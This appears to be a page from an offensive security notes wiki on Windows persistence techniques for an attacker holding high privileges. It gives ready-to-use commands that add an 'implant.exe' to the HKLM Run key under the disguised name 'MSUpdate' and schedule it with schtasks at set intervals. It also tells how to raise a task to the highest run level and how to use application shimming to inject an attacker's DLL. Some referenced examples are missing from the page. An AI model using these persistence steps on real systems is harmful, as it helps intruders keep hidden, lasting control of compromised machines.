search

High Priv User

Persistence techniques for high privileged user

hashtag
Reg Keys:

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v MSUpdate /t REG_SZ /d C:\Windows\Tasks\implant.exe" /f

hashtag
Scheduled Tasks:

hashtag
Create New Task:

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-createarrow-up-right

# normal @ 09:00 daily 
schtasks /create /tn "MyTask\go" /sc daily /st 09:00 /tr "C:\windows\tasks\implant.exe"
# normal @ every 15 minutes
schtasks /create /tn "MyTask\go" /sc minute /mo 15 /tr "C:\windows\tasks\implant.exe"
# normal @ every 3 hours between 9-5
schtasks /create /tn "MyTask\go"  /sc hourly /mo 3 /st 09:00 /etu 17:00 /tr "C:\windows\tasks\implant.exe"


# query
schtasks /query /tn  "MyTask\Go" /fo list /v
# run
schtasks /run /tn "MyTasks/Go"
# delete 
schtasks /delete /tn "MyTasks/Go"

run in an elevated session, and modify the task. copy the xml schtasks:

Within the <Principals></Principals> section add "<RunLevel>HighestAvailable</RunLevel>" delete the original task, and create using the following:

hashtag
Take Over Task/ multiple actions:

hashtag
Service:

create new service:

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/sc-createarrow-up-right

This will fail, but will still execute. advised to create a new proper service:

hashtag
Application Shimming:

x86 is more powerful that x64 noe, so use 32-bit. Use compatability administrator (32-bit) on cmd run:

Right click 'New Database > new' name anything, vednor = Microsoft, select a good windows 32-bit. Select InjectDLL on compatability fixes and point it to your compiled DLL. Click save

PreviousLow Priv UserNextIOS

Last updated